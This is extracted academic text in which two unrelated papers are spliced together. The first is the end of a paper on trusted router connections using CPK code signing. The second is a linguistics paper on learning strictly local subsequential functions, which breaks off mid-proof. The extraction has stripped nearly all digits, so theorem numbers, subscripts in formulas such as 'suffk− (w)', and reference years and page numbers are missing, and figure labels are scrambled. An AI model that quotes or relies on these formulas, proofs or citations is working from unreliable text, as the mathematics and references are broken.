manufacturer is the private key of the manufacturer, codeid is the name of the executing code, and codebd is the hash value of the executing code ontology. any executing code in the router has its own authentication codes, sign and sign . b. identification of software code the router inserts the cpk-card so that it has the cpk authentication function. there are two ways to verify the router: one is to uniformly verify when the router is turned on, and the code that fails to pass the verification is uniformly deleted to ensure that the router system returns to the original state; the other is that when software code is invoked, it is validated first and then executed. verify sign and sign respectively: sig - manufacturer (codeid)=sign ’ sig - manufacturer (codebd)=sign ’ where manufacturer is the public key, it is allowed execute if sign =sign 'and sign =sign ', otherwise it is rejected. in this way to ensure that the implementation of the router code is the manufacturer certification code, other code will not be executed, from the attack of viruses, trojans. viii. conclusion the tcp/ip protocol does not guarantee trusted connections, so it must be modified. based on geographical encoding and location addressing, three key techniques of trusted methods are proposed in this paper. use address identification mechanism to prevent illegal connection; adopt random q&a mechanism to prevent replay attack; software code can be identified by the mechanism, to prevent the intrusion of viruses, trojans. the above design method is fully applicable to the trusted connection of the physical layer. there are two kinds of physical layer: one is the physical layer defined in the seven-layer information network protocol, and the platform supporting the information network is the application program interface (api). the second is the physical layer defined in the telecommunications network, and the platform supporting the telecommunications network is the telecommunications reference point (trp). in the information network, if the network layer can guarantee the credibility of transmission, the security of the physical layer can be replaced by the network layer. however, the physical layer of the telecom network, without modification, cannot achieve trusted connection, cannot prevent illegal access. it is modified in exactly the same way as the router. references [ ] tang xiaodan etc. computer operating system (third edition) [m]. xi’an: xidian university press, . [ ] nan xiang-hao. cpk combined public key system [j]. information security and communication confidentiality, ( ): - . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] nan xianghao. cpk public key system and identification identification. [m]. beijing: people's posts and telecommunications press, . [ ] xie jianping, xu dongmei, etc. digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . learning strictly local subsequential functions jane chandlee university of delaware department of linguistics and cognitive science east main street newark, de janemc@udel.edu rémi eyraud qarma team laboratoire d’informatique fondamentale marseille, france remi.eyraud@ lif.univ-mrs.fr jeffrey heinz university of delaware department of linguistics and cognitive science east main street newark, de heinz@udel.edu abstract we define two proper subclasses of sub- sequential functions based on the concept of strict locality (mcnaughton and papert, ; rogers and pullum, ; rogers et al., ) for formal languages. they are called input and output strictly local (isl and osl). we provide an automata-theoretic characterization of the isl class and theorems establishing how the classes are related to each other and to strictly local languages. we give evidence that local phonological and morpho- logical processes belong to these classes. fi- nally we provide a learning algorithm which provably identifies the class of isl functions in the limit from positive data in polynomial time and data. we demonstrate this learning result on appropriately synthesized artificial corpora. we leave a similar learning result for osl functions for future work and sug- gest future directions for addressing non-local phonological processes. introduction in this paper we define two proper subclasses of sub- sequential functions based on the properties of the well-studied strictly local formal languages (mc- naughton and papert, ; rogers and pullum, ; rogers et al., ). these are languages that can be defined with grammars of substrings of length k (called k-factors), such that a string is in the language only if its own k-factors are a subset of the grammar. these languages have also been char- acterized by rogers and pullum ( ) as those that have the property expressed in the following theo- rem (which can be taken as a defining property): theorem (suffix substitution closure). l is strictly local iff for all strings u , v , u , v , there exists k ∈ n such that for any string x of length k − , if u xv , u xv ∈ l, then u xv ∈ l. these languages can model natural language phonotactic constraints which pick out contiguous substrings bounded by some length k (heinz, ; heinz, ). we define input strictly local (isl) and output strictly local (osl) functions which model phonological processes for which the target and triggering context are a bounded contiguous substring. here our use of ‘process’ is not specific to rule-based grammatical formalisms (such as spe (chomsky and halle, )). isl and osl func- tions model mappings from underlying forms to sur- face forms, which are also the bedrock of constraint- based frameworks like optimality theory (prince and smolensky, ). by showing that local phonological processes can be modeled with isl (and osl) functions, we pro- vide the strongest computational characterization of the input-output mappings these processes repre- sent. while it has been shown that phonological mappings describable with rules of the form a → b / c d (where a, b, c, and d are regular languages) are regular (johnson, ; kaplan and kay, ), and even subsequential (chandlee and heinz, ; heinz and lai, ), many logically possible regular and subsequential mappings are not plausible phonological mappings. since these im- plausible mappings cannot be modeled with isl or osl functions, we provide a more precise notion of transactions of the association for computational linguistics, vol. , pp. – , . action editor: alexander clark. submitted / ; revised / ; published november , . c⃝ association for computational linguistics. what constitues plausible phonological mappings. in addition, we present the input sl function learning algorithm (islfla) and prove that it identifies this class in the limit (gold, ) in poly- nomial time and data (de la higuera, ). our approach follows previous work on learning subse- quential transductions, namely oncina et al. ( ), oncina and varò ( ), castellanos et al. ( ), and gildea and jurafsky ( ). oncina et al. ( ) present ostia (onward subsequential transducer inference algorithm), an algorithm that learns the class of subsequential functions in the limit from positive data. ostia is only guaranteed to identify total functions exactly, but oncina and varò ( ) and castellanos et al. ( ) present the modifica- tions ostia-n, ostia-d, and ostia-r, which learn partial functions using negative data, domain information, and range information, respectively. in terms of linguistic applications, gildea and jurafsky ( ) show that ostia fails to learn the phonological mapping of english flapping when given natural language data. the authors modified ostia with three learning heuristics (context, com- munity, and faithfulness) and showed that the mod- ified learner successfully learns flapping and sev- eral other phonological rules. context encodes the idea that phonological changes depend on the con- text of the segment undergoing the change. commu- nity gives the learner the ability to deduce that seg- ments belonging to a natural class are likely to be- have similarly. lastly, faithfulness, by which under- lying segments are assumed to be realized similarly on the surface, was encoded with a forced alignment between the input-output strings in the data set. we believe this alignment removes ostia’s guarantee that all subsequential functions are learned. similar to the approach of gildea and jurafsky ( ), our learner employs a context bias because it knows its target is an isl function and therefore the transduction only involves bounded contiguous substrings. and similar to ostia-d (oncina and varò, ; castellanos et al., ), the islfla makes use of domain information, because it makes decisions based on the input strings of the data set. it also employs a faithfulness bias in terms of the prop- the alignment was similar to the string-edit distance mehod used in hulden et al. ( ). erty onwardness (see § ). the islfla is supported by a theoretical result like oncina et al. ( ), but learns a more restrictive class of mappings. we be- lieve the theoretical results for this class will lead to new algorithms which include something akin to the community bias and that will succeed on natural lan- guage data while keeping strong theoretical results. the proposed learner also builds on earlier work by chandlee and koirala ( ) and chandlee and jardine ( ) which also used strict locality to learn phonological processes but with weaker theoretical results. the former did not precisely identify the class of functions the learner could learn, and the latter could only guarantee learnability of the isl functions with a closed learning sample. the paper is organized as follows. § presents the mathematical notations to be used. § defines isl and osl functions, provides an automata-theoretic characterization for isl, and establishes some prop- erties of these classes. § demonstrates how these functions can model local phonological processes, including substitution, insertion, and deletion. § presents the islfla, proves that it efficiently learns the class of isl functions, and provides demonstra- tions. § concludes. preliminaries the set of all possible finite strings of symbols from a finite alphabet Σ and the set of strings of length ≤ n are Σ∗ and Σ≤n, respectively. the unique empty string is represented with λ. the length of a string w is |w|, so |λ| = . the set of prefixes of w, pref(w), is {p ∈ Σ∗ | (∃s ∈ Σ∗)[w = ps]}, and the set of suf- fixes of w, suff(w), is {s ∈ Σ∗ | (∃p ∈ Σ∗)[w = ps]}. for all w ∈ Σ∗ and n ∈ n, suffn(w) is the single suffix of w of length n if |w| ≥ n; otherwise suffn(w) = w. if w = ps, then ws− = p and p− w = s. the longest common prefix of a set of strings s, lcp(s), is p ∈ ∩w∈spref(w) such that ∀p′ ∈∩w∈spref(w), |p′| < |p|. a function f with domain a and co-domain b is written f : a → b. we sometimes write x →f y for f(x) = y. when a and b are free monoids (like Σ∗), the input and output languages of a function f are the stringsets dom(f) = {x | (∃y)[x →f y]} and image(f) = {y | (∃x)[x →f y]}, respectively. following oncina et al. ( ), a subsequen- tial finite state transducer (sfst) is a -tuple (q,q , Σ, Γ,δ,σ), where q is a finite set of states, Σ and Γ are finite alphabets, q ∈ q is the initial state, δ ⊆ q × Σ × Γ∗ × q is a set of edges, and σ : q → Γ∗ is the final output function that maps states to strings that are appended to the output if the input ends in that state. δ recursively defines a map- ping δ∗: (q,λ,λ,q) ∈ δ∗; if (q,u,v,q′) ∈ δ∗ and (q′,σ,w,q′′) ∈ δ then (q,uσ,vw,q′′) ∈ δ∗. sfsts are deterministic, which means their edges have the following property: [(q,a,u,r), (q,a,v,s) ∈ δ ⇒ u = v ∧ r = s]. hence, we also refer to δ as the transition function, and ∀(q,a,u,r) ∈ δ, we let δ (q,a) = u and δ (q,a) = r. the relation that a sfst t recog- nizes/accepts/generates is r(t ) = { (x,yz) ∈ Σ∗ × Γ∗ | (∃q ∈ q)[ (q ,x,y,q) ∈ δ∗ ∧z = σ(q) ]} . since sfsts are deterministic, the relations they recognize are functions. subsequential functions are defined as those describable with sfsts. for any function f : Σ∗ → Γ∗ and x ∈ Σ∗, let the tails of x with respect to f be defined as tailsf (x) = { (y,v) | f(xy) = uv ∧ u = lcp(f(xΣ∗)) } . if strings x ,x ∈ Σ∗ have the same set of tails with respect to a function f, they are tail-equivalent with respect to f and we write x ∼f x . clearly, ∼f is an equivalence relation which partitions Σ∗. theorem (oncina and garcia, ). a function f is subsequential iff ∼f partitions Σ∗ into finitely many blocks. the above theorem can be seen as the functional analogue to the myhill-nerode theorem for regular languages. recall that for any stringset l, the tails of a word w w.r.t. l is defined as tailsl(w) = {u | wu ∈ l}. these tails can be used to par- tition Σ∗ into a finite set of equivalence classes iff l is regular. furthermore, these equivalence classes are the basis for constructing the (unique up to isomorphism) smallest deterministic acceptor for a regular language. likewise, oncina and gar- cia’s proof of theorem shows how to construct the (unique up to isomorphism) smallest sfst for a subsequential function f. we refer to this trans- ducer as the canonical transducer for f and denote it with t cf . the states of t cf are in one-to-one corre- spondence with tailsf (x) for all x ∈ Σ∗ (oncina and garcı́a, ). to construct t cf first let, for all x ∈ Σ∗ and a ∈ Σ, the contribution of a w.r.t. x be contf (a,x) = lcp(f(xΣ∗)− lcp(f(xaΣ∗)). then, • q = {tailsf (x) | x ∈ Σ∗}, • q = tailsf (λ), • ∀tailsf (x) ∈ q, σ(tailsf (x)) = lcp(f(xΣ∗))− f(x) if x ∈ dom(f) and is un- defined otherwise, • δ = { (tailsf (x),a,contf (a,x), tailsf (xa))}. t cf has an important property called onwardness. definition (onwardness). for all q ∈ q let the outputs of the edges out of q be outs(q) = { u | (∃a ∈ Σ)(∃r ∈ q)[(q,a,u,r) ∈ δ] } . a sfst t is onward if for all q ∈ q\{q }, lcp(outs(q)) = λ. informally, this means that the writing of output is never delayed. readers are referred to oncina and garcı́a ( ), oncina et al. ( ), and mohri ( ) for more on sfsts. strictly local functions in this section we define input and output strictly local functions and provide properties of these classes. these definitions are analogous to the language-theoretic definition of strictly local lan- guages (theorem ) (rogers and pullum, ; rogers et al., ). definition (input strictly local function). a func- tion f is input strictly local (isl) if there is a k such that for all u ,u ∈ Σ∗, if suffk− (u ) = suffk− (u ) then tailsf (u ) = tailsf (u ). the theorem below establishes an automata- theoretic characterization of isl functions. theorem . a function f is isl iff there is some k such that f can be described with a sfst for which . q = Σ≤k− and q = λ . (∀q ∈ q,∀a ∈ Σ,∀u ∈ Γ∗)[ (q,a,u,q′) ∈ δ ⇒ q′ = suffk− (qa) ] . this theorem helps make clear how isl functions are markovian: the output for input symbol a de- pends on the last (k− ) input symbols. also, since the transducer defined in theorem is determinis- tic, it is unique and we refer to it as t islf . t islf may not be isomorphic to t cf . figure shows t islf (with k = ) and t cf for the identity function. a b! a ba b #:! #:!#:! a b t !isl for identity function ! #:! a,b t c for identity function figure : non-isomorphic t islf (left) and t cf (right) before we present the proof of theorem , we make the following remarks, and then prove a lemma. remark . for all n,m ∈ n with n ≤ m, and for all w ∈ Σ∗, suffn(suffm(w)) = suffn(w) since both w and suffm(w) share the same n-long suffix. remark . for all w,v ∈ Σ∗,k ∈ n, suffk− ( suffk− (w)v ) = suffk− (wv). this is a direct consequence of remark . lemma . let t be a sfst constructed as in the- orem . if (λ,w,u,q) in δ∗ then q = suffk− (w). proof. the proof is by induction on δ∗. the base case follows from the facts that (λ,λ,λ,λ) ∈ δ∗ (by definition of δ∗), and that λ = suffk− (λ). next assume the inductive hypothesis (ih) that there exists w ∈ Σ∗, u ∈ Γ∗, such that (λ,w,u,q) ∈ δ∗ implies q = suffk− (w). we show ∀a ∈ Σ, ∀x ∈ Γ∗ that (λ,wa,ux,q′) ∈ δ∗ implies q′ = suffk− (wa). now (λ,w,u,suffk− (w)) ∈ δ∗ (by ih) so (suffk− (w),a,x,q′) ∈ δ. by construc- tion of t , q′ = suffk− (suffk− (w)a), which by remark , equals suffk− (wa). proof of theorem . (⇐) fix k ∈ n and let f be a function described by t = {q,q , Σ, Γ,δ,σ} con- structed as in theorem . let w ,w ∈ Σ∗ such that suffk− (w ) = suffk− (w ). by lemma , in all figures, single-symbol transition labels indicate that the input and output are identical, and the final output function is represented as a transition on the end-of-word symbol #. both w and w lead to the same state and therefore tailsf (w ) = tailsf (w ). thus f is k-isl. (⇒) consider any isl function f. then there is a k such that (∀w ,w ∈ Σ∗)[suffk− (w ) = suffk− (w ) ⇒ tailsf (w ) = tailsf (w )]. we show that t islf exists. since Σ≤k− is a finite set, the equivalence relation ∼f partitions Σ∗ into at most |Σ≤k− | blocks. hence by theorem , f is subsequential and a canonical subsequential trans- ducer t cf = {qc,q c, Σ, Γ,δc,σc} exists. construct t = {q,q , Σ, Γ,δ,σ} as follows: • q = Σ≤k− and q = λ • ∀q ∈ q,σ(q) = σc ( tailsf (q) ) if f(q) is de- fined, else σ(q) is undefined. • ∀q ∈ q, ∀a ∈ Σ, ∀u ∈ Γ∗,( q,a,u,suffk− (qa) ) ∈ δ iff( tailsf (q),a,u,tailsf (qa) ) ∈ δc. first, by its construction, the states and transitions of t meet requirements ( ) and ( ) of theorem . next, we show that t computes the same function as t cf . we first establish by induc- tion on δ∗ the following (?): ∀w ∈ Σ∗, ∀u ∈ Γ∗, ( q ,w,u,suff k− (w) ) ∈ δ∗ iff( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . clearly ( tailsf (λ),λ,λ,tailsf (λ) ) ∈ δ∗c and( λ,λ,λ,λ ) ∈ δ∗ by definition of the extended tran- sition function. thus the base case is satisfied. next assume the inductive hypothesis (ih) for w ∈ Σ∗ and u ∈ Γ∗. we show ∀a ∈ Σ and ∀x ∈ Γ∗ that ( λ,wa,ux,suffk− (wa) ) ∈ δ∗ iff( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . suppose ( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . by ih, ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c ; hence ( tailsf (w),a,x,tailsf (wa) ) ∈ δc. let q = suffk− (w). observe that suffk− (w) = suffk− (q) by remark . conse- quently, since f is k-isl, tailsf (w) = tailsf (q). similarly, suffk− (wa) = suffk− (qa) and thus tailsf (wa) = tailsf (qa). by substitution then, we have ( tailsf (λ),w,u,tailsf (q) ) ∈ δ∗c and( tailsf (q),a,x,tailsf (qa) ) ∈ δc. by construction of t , ( q,a,x,suffk− (qa) ) ∈ δ. by ih, ( λ,w,u,suffk− (w) ) = ( λ,w,u,q ) ∈ δ∗. thus, ( λ,wa,ux,suffk− (qa) ) ∈ δ∗ which is the same as saying ( λ,wa,ux,suffk− (wa) ) ∈ δ∗. conversely, consider any a ∈ Σ and x ∈ Γ∗ and suppose ( λ,wa,ux,suffk− (wa) ) ∈ δ∗. by ih, ( λ,w,u,suffk− (w) ) ∈ δ∗; hence( suffk− (w),a,x,suffk− (wa) ) ∈ δ. as be- fore, letting q = suffk− (w), it follows that suffk− (w) = suffk− (q) so tailsf (w) = tailsf (q), and suffk− (wa) = suffk− (qa) so tailsf (wa) = tailsf (qa). therefore,( q,a,x,suffk− (qa) ) ∈ δ. by construction of t , this means( tailsf (w),a,x,tailsf (wa) ) ∈ δc. by ih,( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . by the defi- nition of the extended transition function, it follows that ( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . this completes the induction, establishing (?). let w ∈ Σ∗. if f(w) is defined then f(w) = uv where ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c and σc ( tailsf (w) ) = v. from (?), we know ( λ,w,u,suffk− (w) ) ∈ δ∗. also, σ ( suffk− (w) ) = σc ( tailsf (suff k− (w)) ) . since f is k-isl, tailsf (w) = tailsf (suff k− (w)) (cf. remark ). thus σ ( suffk− (w) ) = σc ( tailsf (w) ) = v. there- fore t (w) = uv also. if f(w) is not defined then there are two cases. case : ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . by the above lemma, it follows( λ,w,u,suffk− (w) ) ∈ δ∗ and so t (w) is also de- fined. case : ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c but σc(tailsf (w)) is undefined. by construction of t , σ(suffk− (w)) is also undefined. similar to definition above, the following defi- nition of osl functions says that if the outputs of two input strings share the same suffix of length (k − ), then those inputs have the same tails. definition (output strictly local function). a function f is output strictly local (osl) if there is a k such that for all u ,u ∈ Σ∗, if suffk− (f(u )) = suffk− (f(u )) then tailsf (u ) = tailsf (u ). the automata-theoretic characterization of this class is left as future work. next, some properties of isl and osl functions are identified. the proofs of the following theorems will refer to the example sfsts in figure . first we establish that isl and osl functions are proper subclasses of the subsequential functions. (they are subclasses by definition.) theorem . there are subsequential functions which are neither isl nor osl. a #:! #:! b,c a,b:a,c f a b! b aa b #:! #:!#:! a:b b f a b! a a b,c:b #:! #:!#:! a,b:a,c:a b,c:b f a b! b a:aa a:aa b #:! #:! #:! a:aa b f a #:! #:a a f a a:! #:!#:! f figure : examples for proofs of theorems - proof. consider the subsequential function f in figure and choose any k ∈ n. since f (bc kb) = bckb and f (ackb) = acka it follows that tailsf (bc k) = tailsf (ack) even though in- puts bck and ack share a common suffix of length (k − ). likewise, the outputs of these inputs f (bc k) = bck and f (ack) = ack share a common suffix of length (k − ), but the tails of these inputs, as mentioned, are distinct. hence by definitions and , there is no k for which f is isl or osl. theorem . the class of isl functions is incompa- rable to the class of osl functions. proof. consider f in figure . this function is isl by theorem . however it is not osl. consider any k ∈ n. observe that f (aak) = f (abk) = abk and so the outputs share the same suffix of length (k − ). however, tailsf (aa k) = tailsf (abk) since (a,b) ∈ tailsf (aak) but (a,a) ∈ tailsf (abk). similarly, consider f in figure . this function is -osl because inputs mapped to outputs which end in a have the same tails (i.e., they all lead to state a), and inputs mapped to outputs ending in b have the same tails. however, f is not isl. consider any k ∈ n. the inputs cbk and abk share the same suf- fix of length (k − ). however, tailsf (cbk) = tailsf (ab k) since (b,b) ∈ tailsf (cbk) but (b,a) ∈ tailsf (abk). finally, the two classes are obviously not disjoint, since the identity function is both isl and osl. theorem . the output language of an isl or osl function is not necessarily a strictly local language. proof. consider f in figure . by theorem , it is isl. it is also -osl since inputs mapped to out- puts which end in a have the same tails (i.e., they all lead to state a). similarly, inputs mapped to outputs ending in b have the same tails. let k ∈ n. observe that f (ak) = a k and fur- ther that there is no input x and k such that f (x) = a k+ . since a k = ak− aka = ak− akaa, if the output language of f were sl it would follow, by theorem , that ak− akaa = a k+ also belongs to the output language. but there is no input in Σ∗ which f maps to an odd sequence of a’s. theorem . if either the output or input language of a subsequential function f is strictly local then it does not follow that f belongs to either isl or osl. proof. let Σ = Γ = {a} and consider the function f which, for all n ∈ n, maps an to an if n is even and an to ana if n is odd. f is subsequential, as shown in figure , and its domain, a∗, is a strictly local language. however, f is neither isl nor osl for any k since the tails of a k includes (λ,λ) but the tails of aa k includes (λ,a). next consider f , which for all n ∈ n maps an to am where m = (n div ) if n is even and m = (n div )+ if n is odd. f is subsequential, as shown in figure , and the image(f) = a∗ is strictly local. however, f is neither isl nor osl for any k since the tails of a k includes (a,a) but the tails of aa k includes (a,λ). relevance to phonology this section will briefly discuss the range of phono- logical processes that can be modeled with isl and/or osl functions by providing illustrative ex- amples for three common, representative processes. these are shown in ( ) with spe-style rules. ( ) a. devoicing: d → t / # b. epenthesis: ∅ → @ / {l, r} [-coronal] c. deletion: {t, d}→ ∅ / {t, s} see chandlee ( ) for more details. first, consider the process of final obstruent de- voicing ( -a), attested in german and other lan- guages. this process causes an underlying voiced obstruent in word-final position to surface as its voiceless counterpart. in ( -a), d abbreviates the set of voiced obstruents and t the voiceless obstruents. the mapping from underlying form to surface form that this process describes is represented with the -isl function in figure (note n represents any sonorant). ! d n t d:! n d:! n t t t:dt n:dnd:! #:! #:t #:! #:! t d n figure : t islf for ( -a) with k = and Σ = {t, d, n} in addition to substitution processes like ( -a), an- other common type of process is insertion of a seg- ment, such as the @-epenthesis process attested in dutch (warner et al., ). this process inserts a schwa between a liquid and a non-coronal con- sonant, as specified by ( -b). using l to represent the liquids {l, r} and k to represent any non-coronal consonant, figure presents t islf for this process. following beesley and karttunen ( ), the sym- bol ‘?’ represents any segment of the alphabet other than the ones for which transitions are defined. lastly, an example deletion process from greek (joseph and philippaki-warburton, ) deletes in- terdental fricatives before /t/ or /s/, as in ( -c). fig- ure presents t islf for this process. these abbreviations serve to improve the readability of the fst - it is assumed that the transduction replaces a given voiced obstruent with its voiceless counterpart (not with any voiceless obstruent). this means figure is actually a shorthand for t islf , which would otherwise have a distinct state for each symbol now rep- resented with ‘?’. ! k ? l k:@k ? k ? l l l ?k #:! #:! #:! #:! l k ? figure : t islf for ( -b) with k = and Σ = {l, k, ?} ! d s ? t d:! s ? t:! s ?:t? s d:! ?:d? d:! t:! t:! d:t t:! ? s#:d #:! #:! #:! #:t t:! s ? d figure : t islf for ( -c) with k = and Σ = {t, d, s, ?} the german, dutch, and greek examples demon- strate how isl functions can be used to model the input-output mapping of a phonological rule. be- yond substitution, insertion, and deletion, it is shown in chandlee ( ) that isl and/or osl functions can also model many metathesis patterns, specifi- cally those for which there is an upper bound on the amount of material that intervenes between a segment’s original and surface positions (this ap- pears to include all synchronic patterns). in addi- tion, morpho-phonological processes such as local partial reduplication (i.e., in which the reduplicant is affixed adjacent to the portion of the base it was copied from) and general affixation are also shown to be isl or osl. more generally, we currently con- jecture that a spe-style rewrite rule of the form a → b/ c d which applies simultaneously (left- to-right) describes an input (output) strictly local function iff there is a k such that for all w ∈ cad it is the case that |w| ≤ k. we refer readers to ka- plan and kay ( ) and hulden ( ) for more on how spe rules and application modes determine mappings. in contrast, non-local (long-distance) processes such as vowel harmony with transparent vowels (gainor et al., ; heinz and lai, ), long dis- tance consonant harmony (hansson, ; rose and walker, ; luo, ) and dissimilation (suzuki, ; bennett, ; payne, ), unbounded dis- placement/metathesis (chandlee et al., ; chan- dlee and heinz, ), non-local partial reduplica- tion (riggle, ), and some tonal patterns (jar- dine, ) cannot be modeled with isl or osl functions. in § we comment on the potential for adapting the current analysis to non-local mappings. the next section presents a learning algorithm for isl functions, the islfla. the development of a corresponding algorithm for osl functions is the subject of ongoing work, but see § for comments. learning input strictly local functions we now present a learning algorithm for the class of isl functions that uses its defining property as an in- ductive principle to generalize from a finite amount of data to a possibly infinite function. this learner begins with a prefix tree representation of this data and then generalizes by merging states. its state merging criterion is based on the defining property of isl functions: two input strings with the same suffix of length (k− ) have the same tails. the next section explains in detail how the algorithm works. . the algorithm: islfla given a finite dataset d of input-output string pairs (w,w′) such that f(w) = w′, where f is the target function, the learner tries to build t islf . the dataset is submitted to the learner in the form of a prefix tree transducer (ptt), which is defined in definition . definition (prefix tree transducer). a prefix tree transducer for finite set d = {(w,w′) | f(w) = w′} for some f is ptt(d) = (q,q , Σ, Γ,δ,σ), where • q = ⋃ {pref(w)|(w,w′) ∈ d} and q = λ • δ = {(u,a,λ,ua) | u,ua ∈ q} • σ(w) = w′ for all (w,w′) ∈ d this general strategy is common in grammatical inference. see angluin ( ), heinz ( ), and de la higuera ( ). as an example, the sample of data in ( ) exempli- fies the final devoicing rule in ( -a). figure gives the ptt for this data. ( ) {(d, t), (dd, dt), (dnt, dnt), (nnd, nnt), (tdn, tdn)} ! d n t td tdn nn nnd dd dn dnt t:! #:dnt d:! n:! #:dt #:t n:! d:! #:nnt #:tdnn:!d:! d:! n:! t:! #:! figure : ptt for the data in ( ) given such a ptt, the learner’s first step is to make it onward. in the ptt, the output string is with- held until the end of the input (i.e., #) is reached. in the onward version (shown in figure ), output is advanced as close to the root as possible. this in- volves determining the lcp of all the output strings of all outgoing transitions of a state (starting from the leaves) and suffixing that lcp to the output of the single incoming transition of the state. ! d n t td tdn nn nnd dd dn dnt t:! #:! d:dt n:dnt #:! #:t n:! d:! #:! #:!n:! d:! d:! n:nnt t:tdn #:! figure : onward version of the ptt in figure once the learner has constructed this onward rep- resentation of the data, it begins to merge states, using two nested loops. the outer loop proceeds through the entire state set (ordered lexicographi- cally) and merges each state with the state that cor- responds to its (k − )-length suffix. for example, for final devoicing k = , so each state will be merged with the state that represents its final sym- bol. this merging may introduce non-determinism, which must be removed since by definition t islf is deterministic. non-determinism is removed in the inner loop with additional state merges. consider the situation depicted on the lefthand side of figure , which resulted from a previous merge. the non-determinism could be resolved by d:! n:n d:! t:dt t:dtn d:n n:nn d:! t:dt t:dt figure : before (left) and after (right) pushback merging states and , except for the fact that the output strings of the two transitions differ. before merging and , therefore, the learner performs an operation called pushback that retains the lcp of the two output strings and prefixes what’s left to all output strings of all outgoing transitions from the re- spective destination states. definition (pushback (oncina et al., )). for sfst t = (q,q , Σ, Γ,δ,σ), v ∈ Σ∗, and e = (q,a,w,q′) ∈ δ, pushback ( t ,v,e ) = (q,q , Σ, Γ,δ ′,σ) where δ′ = (δ ∪ {q,a,wv− ,q′)} ∪ {(q′,b,vz,q′′)|(q′,b,z,q′′) ∈ δ}) \ ({(q′,b,z,q′′)}∪{e}). in the example in figure , pushback is applied to the edges ( ,t,dt, ) and ( ,t,dtn, ). only the lcp of the output strings, which is dt, is retained as the output string of both edges. the remainder (which is λ and n, respectively) is prefixed to the output string of all transitions leaving the respective destination state. the result is shown on the right- hand side of figure . essentially, pushback ‘un- does’ onwardness when needed. after pushback, states and can be merged. this removes the initial non-determinism but creates new non-determinism. the inner loop iterates un- til all non-determinism is resolved, after which the outer loop continues with the next state in the order. if the inner loop encounters non-determinism that cannot be removed, the islfla exits with a mes- sage indicating that the data sample is insufficient. non-removable non-determinism occurs if and only if the situation depicted on the left in figure obtains. the normal procedure for removing non- q #:! #:z q s t a:u a:v figure : irreparable non-determinism (left) and non- determinism from an outer loop merge (right). determinism cannot be applied in this case. assum- ing z = λ, all of z would have to be pushed back, but since this transition has no destination state there is nowhere for z to go. ostia handles this situ- ation by rejecting the outer loop merge that led to it, restoring the fst to its state before that merge and moving on to the next possible merge. but the islfla cannot reject merges. if it could, the pos- sibility would arise that two states with the same (k − )-length suffix would remain distinct in the final fst the learner outputs. such a fst would not (by definition) be isl. therefore, the algorithm is at an impasse: rejecting a merge can lead to a non-isl fst, while allowing it can lead to a non- subsequential (hence non-isl) fst. it therefore ter- minates. below is pseudo-code for the islfla. data: ptt(d) result: t islf τ = onward(ptt) q = next(qτ,first(qτ )) while q < last(qτ ) do merge(q, suffk− (q)) while ∃(q,a,x,q ), (q,a,y,q ) ∈ δτ do if a = # and x = y then exit ‘insufficient data’ else pushback(τ, (q,a,x,q ),lcp(x,y)) pushback(τ, (q,a,y,q ),lcp(x,y)) merge(q ,q ) q = next(qτ,q) return τ algorithm : pseudo-code for the islfla . learning results here, we present a proof that the islfla identifies the class of isl functions in the limit from positive data, in the sense of gold ( ), with polynomial bounds on time and data (de la higuera, ). first, we establish the notion of characteristic sample. definition (characteristic sample). a sample cs is characteristic of a function f for an algorithm a if for all samples s s.t. cs ⊆ s, a returns a represen- tation τ such that for all x ∈ dom(f), τ(x) = f(x), and for all x /∈ dom(f), τ(x) is not defined. we can now define the learning criteria. definition (identification in polynomial time and data (de la higuera, )). a class f of functions is identifiable in polynomial time and data using a class t of representations iff there exist an algorithm a and two polynomials p() and q() such that: . given a sample s of size m for f ∈ f, a re- turns a hypothesis in o(p(m)) time; . for each representation τ of size k of a function f ∈ f, there exists a characteristic sample cs of f for a of size at most o(q(k)). essentially the proof for convergence follows from the fact that given a sufficient sample the al- gorithm merges all and only states with the same (k − )-length suffix. clearly, merges in the outer loop only involve states with the same (k − )-length suffix. this is also the case for inner loop merges. consider the scenario depicted on the right in figure , in which q is a state created by an outer loop merge. after pushback, states s and t will be merged. if x = suffk− (q), then both s and t must have xa as a suffix. since |xa| = k, it follows that suffk− (s) = suffk− (t). it also follows that additional states merged to remove non-determinism resulting from the merge of s and t will have the same suffix of length (k− ). to show that all states with the same (k − )-length suffix will be merged, it is shown that the islfla will never encounter the situation in figure , provided the data set includes a seed de- fined as follows. definition (islfla seed). given a k-isl function f and t islf , let q′ = {q ∈ q | δ (q, #) = λ}. a seed for f is s = s′ ∪s′′, where • s′ = {(w,w′) | [w ∈ Σ≤k ∧f(w) = w′]} • s′′ = {(wa,w′′) | a ∈ Σ, [w ∈ Σk ∧ suffk− (w) ∈ q′ ∧f(wa) = w′′]}. lemma (convergence). a seed for an isl func- tion f is a characteristic sample for islfla. proof. we show that for any isl function f and a dataset d that contains a seed s the output of the islfla is t islf . let ptt(d) = (qptt ,q p t t , Σ, Γ,δptt , σptt ) be the input to the islfla and t = (qt ,q t , Σ, Γ,δt ,σt ) be its output. first we show that qt = Σ≤k− . by definitions and , Σ≤k− ⊆ qptt . since the islfla only merges states with the same (k− )-length suffix, Σ≤k− ⊆ qt . since it does not exit until all states q have been merged with suffk− (q), qt = Σ≤k− . next we show that given s, the algorithm will never need to merge two states q and q such that δ (q , #) = δ (q , #). let δ (q , #) = z, and δ (q , #) = x with z = x and q = suffk− (q ). by definition , tailsf (q ) = tailsf (q ), so if z = x it must be the case that q does not have tran- sitions for all a ∈ Σ. this is because the only way for the output strings of the outgoing transitions of q to differ from those of q is if fewer transitions were present on q when the ptt was made onward. (by definition of s we know q has transitions for all a ∈ Σ.) but since tailsf (q ) = tailsf (q ), we also know that z = ux for some u ∈ Γ∗. by definition , all states up to length k have tran- sitions for all 